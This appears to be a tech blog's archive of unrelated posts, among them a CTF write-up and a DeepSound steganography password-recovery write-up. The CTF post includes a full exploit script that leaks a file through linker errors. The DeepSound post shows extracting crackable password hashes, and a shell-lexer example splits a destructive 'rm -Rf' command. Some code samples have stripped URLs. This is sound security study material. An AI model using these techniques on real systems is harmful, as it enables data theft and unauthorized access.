Surround Sound from Apple TV and an Onkyo Receiver

I use an Apple TV (4th Generation) with a decade-old Onkyo HT-R280 receiver in a 5.1-channel surround sound system. I was not getting proper surround sound audio from the Apple TV, so I investigated the correct settings to use. There is some confusion on discussion forums about the correct settings and expected behavior, which this article attempts to clear up.

The first thing to check is the Apple TV’s audio output setting.

On the Apple TV, open the Settings app and navigate to “Video and Audio” and then “Audio Format.” You should set “Change Format” to Off. This lets tvOS choose the best format to send audio to your receiver.

In the bottom left part of the screen, the text will tell you which audio mode tvOS is using. It might say something like,

Audio will be decoded and sent to your equipment as uncompressed multichannel LPCM.

In this case, you would not see the Dolby logo on your receiver. To make it more confusing, my receiver does display Dolby when it first turns on, but the indicator goes away after the first sound (such as a navigation click) plays; this can be ignored. The logo is absent because the Apple TV is already decoding the Dolby signal and sending the decoded audio to the receiver, rather than passing the Dolby bitstream through.

Let’s move on to the receiver now.

If the receiver has both “A” and “B” sets of speakers, having the “B” speakers on may degrade surround sound output. On my receiver, this limits output to stereo. Use the “A” speakers only.

Next you must select the “listening mode” on the receiver to properly play each audio channel through the corresponding speaker. My receiver has over two dozen modes, chosen by four different buttons on the remote: Movie/TV, Music, Game, and Stereo. Only some modes are available depending on the audio signal type. The Display button will show the current mode.

With the Direct or Multichannel listening modes, when you are playing 5.1-channel audio, the sound will play from the correct speakers. You can use the handy Surround Speaker Check app by Jeff Perrin to verify this. (Apple, why isn’t this built in?) Cycling with the Display button, you will see the input signal is MCH PCM 5.1.

However, if your audio source is only stereo (the input signal does not say MCH PCM 5.1 but something like PCM fs: 48kHz), these listening modes will play audio only from the front speakers. When the input is stereo, you may want to explore some of the other modes (described in the manual) which send some of the audio signal to the surround speakers.

Happily, my receiver seems to be smart enough to remember which listening mode I want for which input signal type. So I can just play some content with true surround sound and set the desired listening mode, then switch to something stereo and set the listening mode to another.

Here are my findings from a brief test of different content on my Apple TV in January 2020:

  • YouTube does not support surround sound, and you’ll drive yourself crazy trying to test your system through videos that claim to be for this purpose!

  • Apple Music audio is not in surround sound, though one of the music videos I tested with was.

  • Netflix, Amazon Prime Video, and iTunes TV shows and movies all support surround sound for some content. In both Netflix and Amazon Prime Video, a “5.1” icon appears next to the runtime on the summary page.

  • Hulu, at the time of writing, does not support 5.1 surround sound on Apple TV, though they do support it on some devices.

  • Apple’s Trailers app’s movie trailer for Joker (2019) was not in surround sound, but the same trailer in the iTunes Movies app was.

  • AirPlay is an interesting case. If you are using AirPlay Video to play (for example) a surround sound music video, it will play as such on the Apple TV. However if you set a Mac’s audio output device to the Apple TV, and then play the same video (so that the picture is on the Mac’s display, and the audio is going through the Apple TV), the audio will be downgraded to stereo.

hxp 36C3 CTF Compilerbot

This post was originally published on the RPISEC blog.

The server for this challenge accepts C source code and compiles it into an executable using Clang. Our objective is to recover the contents of the flag file, but our code is never executed. The server only tells us whether the compilation was successful and produced no warnings.

The server’s response could serve as an oracle if we are able to guess part of the flag and make the compilation fail or emit a warning if our guess is incorrect.

We threw out any approach that involves #include "flag" because the flag is likely not valid C code, and we didn’t think one could abuse the preprocessor to create a string from the contents of a file, but other teams were successful with this.

Our solution’s starting point is to use inline assembly and the .incbin assembler directive, which includes the given file, or a portion of it, verbatim in the binary. (We first learned about this from write-ups of the Oneline Calc challenge from TokyoWesterns CTF 2019.)

When we use .incbin, the file contents are not embedded until the assembler stage, so we aren’t going to be able to trigger an error dependent on the content of the flag before this stage (or during it).

The last stage, linking, follows the assembler. It transforms the object file produced by the assembler into an executable. This is the stage we should target: we want to produce an object file that the linker either accepts or rejects based on the contents of the flag.

To do this, we need to look at structures in the object file that the linker uses. There are a number of special sections (see elf(5), under “Section header”) which hold control information used by the linker; if one of these sections is invalid, it may cause a linker error.

For example, the GNU ld linker creates a lookup table from .eh_frame sections, and if one of them is not correctly formed, the table generation will fail. We can create a valid section manually with inline assembly:

__asm__ (
    // create a dummy Call Frame Information record
    ".pushsection .eh_frame\n"

    // length of CIE record
    ".long 0x0000000D\n"

    // CIE fields
    ".long 0x00000000\n"
    ".byte 0x01\n"
    ".asciz \"zR\"\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"

    ".popsection\n"
);


Since the record contains a length field, we could corrupt the .eh_frame by providing a length that is too long or too short, causing the linker to read garbage when it scans the next record. For instance, we could read one byte of the flag file into the least-significant byte of the record length:

    // length of CIE record
    ".incbin \"flag\", 0, 1\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"

If the first byte of the flag has value 13 (carriage return), then the record length is correct and there will be no linker error. But for any other value, we get:

/usr/bin/ld: error in /tmp/test-a17b24.o(.eh_frame); no .eh_frame_hdr table will be created

(Note that the compilation technically succeeds but the challenge server considers any message written to standard error as a failure.)

This can be used as our oracle. To test whether the first byte is some value other than 13, we just need to pad the end of the record:

    // pad extra bytes; linking will succeed if the first byte of the flag
    // is 97 (ASCII 'a')
    ".rept 97 - 13\n"
    ".byte 0\n"
    ".endr\n"

Now we can adjust the amount of padding to change the record size until the linker stops complaining, which indicates that the record size is consistent with its length field, and therefore that the record size equals the value of the first byte of the flag.

This can be repeated for the next byte until the entire flag is recovered.


Thanks to Sophia d’Antoine for fixing an oversight in my exploit code.

#!/usr/bin/env python
import subprocess

payload = r'''
__asm__ (
    ".pushsection .eh_frame\n"

    // length of CIE record, using one byte from flag
    // length must be at least 13
    ".incbin \"flag\", __OFFSET__, 1\n"
    ".rept 3\n"
    ".byte 0\n"
    ".endr\n"

    // 13 bytes of CIE record junk
    ".long 0x00000000\n"
    ".byte 0x01\n"
    ".asciz \"zR\"\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"
    ".byte 0\n"

    ".rept __GUESS__ - 13\n"
    ".byte 0\n"
    ".endr\n"

    ".popsection\n"
);
'''

# this runs the compiler locally; running against the challenge server is
# left as an exercise to the reader
def try_compile(code):
    code = 'int main(void) { ' + code + ' }'
    sub = subprocess.Popen(['clang', '-x', 'c', '-o', '/dev/null', '-'],
                           stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT, universal_newlines=True)
    stdout, _ = sub.communicate(code)
    return sub.returncode == 0 and stdout.strip() == ''

# test first
code = payload
code = code.replace(r'".incbin \"flag\", __OFFSET__, 1\n"',
                    r'".byte 0x20\n"')
code = code.replace('__GUESS__', '0x20')
assert try_compile(code)

# recover the flag
flag = ''
for flag_offset in range(32):
    for guess in range(0x20, 0x7f):
        code = payload
        code = code.replace('__GUESS__', str(guess))
        code = code.replace('__OFFSET__', str(flag_offset))
        if try_compile(code):
            flag += chr(guess)
            break
    else:
        # no guess worked, maybe end of the flag
        break

print('flag is', flag)


Due to an oversight, I initially implemented this exploit against GCC and found a slightly different oracle:

I created a dummy section of a certain number of bytes, and a relocation entry that would increment the byte at a given offset.

GCC, but not Clang, will apply the relocation by the time the final executable is linked. (If you can make this work with Clang, please let me know.)

If the relocation entry’s offset is beyond the bounds of the dummy section, the linker complains:

/usr/bin/ld: /tmp/ccQDGoK1.o(.foo+0x10): reloc against `*UND*': error 4
/usr/bin/ld: final link failed: nonrepresentable section on output
collect2: error: ld returned 1 exit status

We can apply the same general idea as above: use .incbin to read a byte of the flag into the relocation entry’s offset, and adjust the size of the dummy section according to our guess.

__asm__ (
    // create a section of N bytes
    ".pushsection .foo\n"
    ".rept 97\n"
    ".byte 0xFF\n"
    ".endr\n"

    // create a relocation that tries to modify our section at some offset
    // based on a single byte of the flag; if it is out of bounds then the
    // linker will error
    ".align 1\n"

    // offset into .foo -- must not overflow!
    ".incbin \"flag\", 0, 1\n"
    ".rept 7\n"
    ".byte 0\n"
    ".endr\n"

    ".quad 0x000000000000000E\n" // type of reloc: R_X86_64_8
    ".quad 0x0000000000000001\n" // value to add at that offset

    ".popsection\n"
);

Obtaining and Modifying Firmware for the Striiv Fusion

A poor decision was made and I am now the owner of five Striiv Fusion fitness trackers. With a few spares to brick, I wanted to see how far I could get meddling with the tracker’s firmware.

First, I needed to obtain the firmware image. The companion smartphone app is capable of performing an over-the-air update of the tracker, so I tried to learn how the app obtains these updates.

Sniffing the iOS app’s traffic, I could see the tracker’s firmware version being sent during a software update check, but the server answered with a 204 No Content response—the software is already the latest version.

After a few failures modifying the update check request to include an out-of-date version number to see if the server would send me new firmware, I discovered I needed to use one of the earlier version numbers from the release notes. Then:

{
  "forced_update": true,
  "binary": "UEsDBBQAAAAAAFGL...",
  "zipped": true
}

The update check API responds with a Base64-encoded Zip file containing a binary file called MCU.bin.
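Unpacking the response is mechanical. Here is a minimal sketch, with the field names taken from the response shown above (the top-level response shape is otherwise an assumption):

```python
import base64
import io
import json
import zipfile

def extract_firmware(response_body: str) -> bytes:
    """Decode an update-check response and pull out the MCU.bin firmware."""
    resp = json.loads(response_body)
    assert resp.get("zipped"), "expected a zipped binary"
    blob = base64.b64decode(resp["binary"])
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.read("MCU.bin")
```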

Binwalk was not able to identify any part of the binary, but after a lot of sleuthing and an extraordinarily clumsy teardown, I was able to identify the Nordic Semiconductor nRF51422-QFAAE0 system-on-chip (I had previously misidentified the SoC), which has an ARM Cortex-M0 core. Given the correct architecture, Ghidra’s aggressive instruction finder analysis is able to locate executable code within the plain binary format file.

I have identified a few C standard library routines and toyed, unsuccessfully, with using Ghidra’s Function ID to attribute symbol names to some of the interesting functionality. Still, I wanted to try sending a modified firmware image to the tracker to see if firmware validation would be an obstacle. So I made a small change to one of the strings.

To send the patched firmware to the tracker, I wrote an add-on script for mitmproxy that intercepts the app’s software update check and responds with my own binary.
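The add-on only needs to answer the update check with a body in the same envelope the real server uses. A sketch of the response-building half follows; the commented-out mitmproxy hook and its URL pattern are assumptions, not the actual endpoint:

```python
import base64
import io
import json
import zipfile

def build_update_response(firmware: bytes) -> bytes:
    """Package a patched firmware image the way the update API does:
    zip it as MCU.bin, Base64-encode it, and wrap it in the JSON envelope."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("MCU.bin", firmware)
    return json.dumps({
        "forced_update": True,
        "binary": base64.b64encode(buf.getvalue()).decode(),
        "zipped": True,
    }).encode()

# In the mitmproxy add-on, a response hook swaps in this body:
#
#   def response(flow):
#       # matching on "update" in the URL is a guess at the endpoint
#       if "update" in flow.request.pretty_url:
#           flow.response.status_code = 200
#           flow.response.content = build_update_response(PATCHED_FIRMWARE)
```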

HTTP Request Translator

I am releasing HTTP Request Translator, a tool for converting HTTP requests between formats, such as from a curl command-line invocation to a Python Requests call. This should be useful for automation, penetration testing, and scraping.

curl '' \
  -XPOST \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --header 'X-Magic-Header: Xyzzy' \
  --data 'key=abscissa'

    'q': 'foo bar',
    'Content-Type': 'application/x-www-form-urlencoded',
    'X-Magic-Header': 'Xyzzy',
    'key': 'abscissa'

It works really well with the Safari Web Inspector to quickly generate code for replaying an XMLHttpRequest:

Safari Web Inspector

If you are translating from something other than curl, you can just capture the raw HTTP request (say, with Wireshark) and the tool can parse that as well.
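The tool itself is JavaScript, but the parsing step is simple enough to sketch in a few lines of Python (this mirrors the idea, not the tool's actual implementation):

```python
def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, headers, and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split()
    headers = dict(line.split(": ", 1) for line in header_lines)
    return {"method": method, "path": path,
            "headers": headers, "body": body}
```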

I wouldn’t say that the tool is complete; it doesn’t know about some basic things right now (such as cookies), and I don’t expect that I’ll ever have a need to support less common curl options such as --proxy-header. It would also be nice to generate JavaScript that makes XHRs. But the code should make it pretty easy to contribute support for new features as future use cases call for.

This was my first project using a modern JavaScript toolchain, in particular React, LibSass, and webpack. As such, I’m sure there are things to be improved.

Shell Lexing for Node.js

I published node-shlex, a Node.js package for tokenizing UNIX-like shell commands and performing shell escaping.

var split = require("shlex").split

// returns: [ 'ls', '-al', '/' ]
split('ls -al /')

// returns [ 'rm', '-Rf', '/Volumes/Macintosh HD' ]
split('rm -Rf "/Volumes"/Macintosh\\ HD')

I began by porting the shlex module from the Python Standard Library, originally contributed by Eric S. Raymond. But I found the code to be incomprehensible, with a bewildering state machine and a complex matrix of modes of operation. My rewrite of the main tokenization routine has 45% fewer lines of code, including whitespace and a few comments, yet still matches the Python module’s output on over 60 tests.

As an alternative, there is shell-quote, which gets 1.1 million weekly downloads and is used by over 350 other packages. But it seems to be abandoned with several known bugs, and has a half-baked implementation of environment variable interpolation that might lead to unexpected behavior.

Happy GDPR Day

Today, the European Union’s General Data Protection Regulation comes into force. For the past several months, technology companies have been racing to meet its demands, which can involve substantial engineering work to retrofit existing platforms.

My former colleagues at Apple have launched a new self-service Data and Privacy tool and a Privacy Enquiries support website that give customers visibility into (and control over) the information about them that Apple keeps. Recent software updates also added data usage disclosures to inform users when and how their data is being processed. No, The Verge, it has nothing to do with stopping phishing.

As journalists have been trying out these tools, they’ve reported that the company has been true to its word about its devotion to privacy. Jefferson Graham wrote,

The zip file I eventually received from Apple was tiny, only 9 megabytes, compared to 243 MB from Google and 881 MB from Facebook. And there’s not much there, because Apple says the information is primarily kept on your device, not its servers.

This is no accident. Apple engineers go to great lengths to design software that minimizes data collection and protects the user’s information. From end-to-end encrypted iMessage to feats like on-device photo classification and privacy-preserving telemetry, so many features took a more challenging path because it was the right thing to do. And all without apparent sacrifice to usability or capability.

So today, in thanks for their tireless work looking out for our privacy in an industry that, at best, doesn’t seem to care, I sent my friends on the Privacy Engineering team a treat in honor of GDPR Day:

GDPR Day Cake

Betsy Braun, the Bay Area’s most ebullient violinist and music instructor, designed, baked, and decorated this three-layer vanilla buttercream cake for the occasion. Let’s say the layers represent transparency, control, and consent—the delicious foundations of privacy protection. Thank you, Betsy!

Sakura Time-Lapse Camera

It’s cherry blossom season in Japan, and everyone loses their collective minds over it. There are official forecasts of when the trees will bloom. There are different words to describe the progression of the flowers. Admirers flock to tree-lined parks for picnics during the day, and then return again at night for lantern-lit strolls. There are special sweets and even seasonal beer cans.

As I was drifting to sleep one night, I thought about how lovely it would be to watch the bloom arrive and recede in timelapse.

Cherry blossoms in Yoichi, Japan

I remembered I had brought a cheap GoPro knock-off, an APEMAN-brand action cam, so on a lark I tested to see if it could act as a USB webcam—and indeed it can. If you start it up attached to a computer, it asks whether it should act as a video camera or mass storage device.

The SakuraCam began to take shape. I headed to the ¥100 store with the basic parts—the camera, a Raspberry Pi, and a 16000mAh battery pack—and played around with arranging everything in variously-sized plastic organizer boxes, imagining how the cables would be dressed and assessing them for weather resistance. I settled on a shallow toolbox-style one with a handle and toggle latch.

I made a coarse cut to allow the camera lens to stick through the case, then sealed up the gaps with hot glue. (In retrospect, the mirror-image arrangement would have avoided some problems.) The camera’s USB connection doubled as its power supply, and the Raspberry Pi was in turn powered by the battery. A short script invoked fswebcam to capture a frame from the webcam at regular intervals, and purged the oldest frames when the SD card filled up. At one frame per minute sped up to 24 fps, I had enough space to store about 7 minutes’ worth of photos.
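The script described above amounts to a capture loop plus a purge policy. A sketch, with the frame directory and capture settings as placeholders (my actual paths and resolution differed):

```python
import os
import subprocess
import time

FRAME_DIR = "/home/pi/frames"   # placeholder path
KEEP = 7 * 60 * 24              # ~7 minutes of 24 fps video from 1-minute frames

def frames_to_purge(frames, keep):
    """Given timestamped (hence sortable) frame filenames, return the
    oldest ones to delete so that only `keep` remain."""
    frames = sorted(frames)
    return frames[:-keep] if len(frames) > keep else []

def capture_loop(interval=60):
    while True:
        name = time.strftime("%Y%m%d-%H%M%S.jpg")
        subprocess.run(["fswebcam", "--no-banner",
                        os.path.join(FRAME_DIR, name)])
        for old in frames_to_purge(os.listdir(FRAME_DIR), KEEP):
            os.remove(os.path.join(FRAME_DIR, old))
        time.sleep(interval)
```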

SakuraCam Mark I

Everything seemed to have fallen into place until, after a few minutes of testing at 5 fps, the camera reset. And then it reset again after another few minutes. Unluckily, upon reset it returns to the mass storage / video camera prompt, which requires physical interaction—a hard failure in the field.

Unable to scrounge up another webcam, the project seemed unworkable. I thumbed through the camera’s settings, which include a time-lapse mode, but the interval can’t be set any longer than a few seconds. Then I noticed the Wi-Fi settings, and wondered whether I could use it as an IP camera.

In Wi-Fi mode, the camera creates a wireless network which you join from your smartphone, and then you are able to control the camera via an app. It’s not entirely clear whether there is an official app to do so, but CamKing seemed to be the closest thing, and while it is not the most well-crafted app in existence, it works. It allows remote configuration of some of the camera’s settings, such as the exposure value, and best of all, it can capture still frames at 5K resolution, far exceeding the 1080p I could get from the camera as a USB video device.

The only challenge now was figuring out the protocol for triggering a photo.

I pulled the Android APK for CamKing to decompile it, and found that it talks to a web server on the camera that serves a browsable directory index of the SD card, as well as a video stream on port 8192. Taking photos, changing settings, and so on are done by making a GET request with a corresponding command number:

# Set the clock
$ curl
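For scripting, each action reduces to building one URL. A sketch of the construction (the camera's AP address and the query-parameter names are assumptions from my notes on the protocol, not official documentation):

```python
from urllib.parse import urlencode

CAMERA_HOST = ""   # placeholder; substitute the camera's Wi-Fi AP address

def command_url(cmd: int, **params) -> str:
    """Build a command URL of the form the app uses: a GET request carrying
    a numeric command number plus optional parameters."""
    query = {"custom": 1, "cmd": cmd}   # parameter names are assumptions
    query.update(params)
    return "http://%s/?%s" % (CAMERA_HOST, urlencode(query))
```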

Amazingly, the web server appears to be HFS, an open source web server for Windows. I was originally led to HFS by the HTTP headers, but dismissed it because it’s a GUI app, and, well, for Windows. Even when the API was returning paths starting with A:\, I chalked it up to some confused developer. Then it dawned on me that HFS is running in Wine! Surely this was the most practical solution.

Another trick I learned is that rvictl -s [udid] on macOS will create an rvi# interface that taps the network connection of an iOS device (I wasn’t able to inject any packets, but I tried), a handy way to sniff the unencrypted traffic between CamKing and the camera as I mapped out the command numbers.

WireShark sniffing iOS traffic

The APEMAN uses a digital camera SoC from Novatek, a fact that is not well hidden: photos on the SD card are stored in a directory called NOVATEK/, and the USB vendor ID belongs to them. I suspect the SoC is a clone of the Ambarella sports camera SoC, once used in the GoPro, and has found its way into most of the sub-$100 action cams and dashboard cameras with unheard-of brands like Campark and Crosstour. Steven Hiscocks’s web interface to the YI Dash Cam, for instance, uses some of the same command numbers and so likely works with these other devices.

My Python module for communicating with the API is published on GitHub, although the code is very much a rough draft.

Porting the time-lapse script over to the new API was painless. However, as the Raspberry Pi now needs to be on the camera’s Wi-Fi network, I lose SSH access to monitor its status. (The camera AP does not support multiple clients.) I made two improvements to help:

First, I was able to wrest control over the green activity LED, a small feat on the Raspberry Pi 3 Model B, to blink out a status report after each capture.
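Once the LED is released from its default trigger, blinking it is just a matter of writing to its sysfs brightness file. A sketch (the sysfs path is the usual one for the Pi's ACT LED, but treat it as an assumption for your board and kernel):

```python
import time

LED = "/sys/class/leds/led0"   # ACT LED path on a Raspberry Pi 3 (assumption)

def blink(count, on=0.2, off=0.2, led=LED):
    """Blink the activity LED `count` times.  The LED's trigger must first
    be set to "none" (echo none > <led>/trigger, as root)."""
    for _ in range(count):
        for value, pause in (("1", on), ("0", off)):
            with open(led + "/brightness", "w") as f:
                f.write(value)
            time.sleep(pause)
```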

Second, I configured the device to automatically join the camera network when it is broadcasting, and rejoin the home network when it goes away. This way I can easily gain debug access simply by powering down the camera.

I did not succeed at powering the camera off of the Raspberry Pi without triggering the USB mode selection menu. (It might be useful to know how in the future, but it wasn’t enough to de-authorize the device using udev.) But since the communication is now wireless, I was able to simply move the Raspberry Pi indoors and power the camera directly from the battery. This also pushed the battery life over 24 hours.

So, where’s the video? Ultimately, I didn’t capture the footage I had hoped for, and I decided to stop investigating histogram matching and tone mapping to improve the quality of the image. Hopefully I’ll be able to use what I’ve learned on another project.

Password recovery on DeepSound steganography

DeepSound is a steganography utility that can hide data inside of audio files. The contents can optionally be protected with a password, in which case DeepSound advertises that it encrypts using AES-256.

Used incorrectly, the security of all cryptographic algorithms, including (or perhaps especially) the beloved AES, can be devastatingly eroded. I took a peek at DeepSound to see if I could find any weaknesses in the way it performs encryption that would allow me to recover the payload from a carrier file.

DeepSound screenshot

The first thing I noticed was that DeepSound will only prompt for a password when it is fed an audio file that actually does contain an encrypted payload. This ability to distinguish between encrypted and unencrypted payloads without first providing the password means that there is some metadata that should be easily sifted out of the carrier file. This was my first lead to investigate.

Since DeepSound is written using .NET and not obfuscated, it was possible to decompile the binary and just read the code. As a newcomer to reverse engineering C# apps, I found JetBrains dotPeek to be useful for exploring the decompiled code, and dnSpy to be a helpful debugger.

It was easy to understand from the decompiled code how DeepSound stores the header for its payload inside the audio file using a simple encoding mechanism. (Remarkably, the payload remains intact after being transcoded to another format and back.) After it has located this header, DeepSound checks a flag to see whether the payload is encrypted and prompts for the password if so.

public void AnalyzeStream(Stream stream) {
  if (encrypted) {
    // Extract 20 bytes from the header
    byte[] hdrhash = new byte[20];
    Array.Copy(header, 6, hdrhash, 0, 20);
    // Prompt for the password
    KeyRequiredEventArgs e = new KeyRequiredEventArgs();
    this.OnKeyRequired(this, e);
    if (e.Cancel)
      throw new KeyEnterCanceledException();
    this.Key = e.Key;
    // Check if the SHA-1 hash of the AES key matches what's in the header
    byte[] keyhash = SHA1.Create().ComputeHash(this.aes.Key);
    if (!ArrayTools.CompareArrays(keyhash, hdrhash))
      throw new Exception("Wrong password.");
  }
}

To validate the entered password, DeepSound computes the SHA-1 hash of some AES key—not the password directly—and compares it to a hash stored in the header. But it isn’t obvious here where this AES key came from; if it were generated with a good password-based key derivation function, for instance, then this scheme might be reasonably secure.

It turns out that the line this.Key = e.Key, which copies the entered password into an instance variable, does more than meets the eye:

public string Key {
  set {
    byte[] buffer = new byte[32];
    byte[] bytes = this.encoding.GetBytes(value);
    Array.Copy(bytes, buffer, Math.Min(bytes.Length, 32));
    this.hash = SHA1.Create().ComputeHash(buffer);
    this.aes.Key = buffer;
  }
}

A secure PBKDF was too much to hope for: the password is used directly as the AES key, and the SHA-1 of the password, unsalted and uniterated, is what’s written into the audio file.

From here it was easy to write a script to locate the payload in a carrier file and extract the SHA-1 hash from its header. Then it should be possible to crack the password by running a tool like John the Ripper or hashcat, or sometimes just by searching Google.
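Once the header is located, pulling out the crackable hash is trivial; the offset comes from the decompiled AnalyzeStream above, which copies 20 bytes starting at offset 6:

```python
def extract_hash(header: bytes) -> str:
    """Return (as hex) the SHA-1 stored in a DeepSound payload header.
    Per the decompiled code, the 20-byte hash sits at offset 6."""
    if len(header) < 26:
        raise ValueError("header too short")
    return header[6:26].hex()
```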

Except that I overlooked something: The Key setter doesn’t compute the hash of the password directly; it copies it into a 32-byte buffer and computes the hash of that. In effect, it truncates or null-pads the password to a length of 32 bytes first, an idiosyncrasy that precludes the use of off-the-shelf tools.

I decided to contribute support for this flavor of SHA-1 hash to John the Ripper, a tool that already knows about the imaginative password hashing schemes used by dozens of software packages. The developers of John have realized that most of these schemes are small variations on one another, whether it’s md5(sha1(password)) or sha1(md5(md5(password))) or what have you. Optimizing each of these algorithms by hand is too time consuming, so they have made a clever system that allows these schemes to be expressed in terms of some primitive building blocks.

For instance, DeepSound’s hashing scheme can be expressed in terms of four of these primitives: First, zero out our buffer. Then copy the password to it. Set the length of the buffer to 32, regardless of how long the password was. Lastly, compute the SHA-1 of the buffer.
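In plain Python, rather than John's primitive notation, the whole scheme amounts to (assuming the app's string encoding yields one byte per character for typical passwords):

```python
import hashlib

def deepsound_hash(password: str) -> str:
    """DeepSound's password hash: the password truncated or null-padded to
    exactly 32 bytes, then SHA-1'd -- no salt, no iteration."""
    buf = password.encode("utf-8")[:32].ljust(32, b"\x00")
    return hashlib.sha1(buf).hexdigest()
```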


Admittedly, finding the right sequence of primitives was not trivial, and there are a number of other switches to flip that I found a bit confusing. But in the end it took only 8 lines to teach John about the new hashing scheme.

My changes have been contributed back to the John the Ripper community edition, including the script for extracting hashes from carrier files. My thanks to Dhiru Kholia for the code review.

Unbeknown to me, DeepSound was featured in a scene of Mr. Robot, which caught the attention of Alfonso Muñoz. Alfonso has a nice write-up of his blackbox reverse engineering of the payload encoding, in which he noticed another bad flaw: the use of ECB mode for encryption. Even without the password you can see penguins.

Thunderbolt 3 Unblocker

I’ve published Thunderbolt 3 Unblocker, a macOS kernel extension that patches IOThunderboltFamily to disable peripheral compatibility checks. This permits the use of some unsupported peripherals such as the Razer Core external GPU enclosure.

One vendor explained,

Apple has chosen to prevent Thunderbolt 3 devices using currently available controller chips from Texas Instruments from enumerating and functioning on the 2016 MacBook Pros. … Thunderbolt 3 peripherals [released prior to November 2016] which use this controller chip are incompatible with the new 2016 Thunderbolt 3 MacBooks.

These existing devices use Intel’s Thunderbolt 3 chipset (Alpine Ridge) in combination with the first generation of TI USB-C chipset (TPS65982). Apple requires the 2nd generation TPS65983 chipset for peripherals to be compatible.

Of course, patching your kernel to make it do unsupported things is not the most cautious idea, and there is likely a reason why Apple decided to disable this older chipset in the first place.

Previously, Tian Zhang’s TB3 Enabler script could be used to patch the IOThunderboltFamily binary on disk. This technique required that the script be kept in sync with macOS releases. The patch would also need to be reapplied after every system upgrade, and reverting back could be difficult. The runtime patching technique of Thunderbolt 3 Unblocker addresses all of these shortcomings.

One of the contributions of Thunderbolt 3 Unblocker is xnu_override, the small static library that does the patching in the kernel. (A few people also wrote to me to mention Lilu, a larger project with similar goals.) One nice feature of xnu_override is that it can revert all patches when you unload the kext.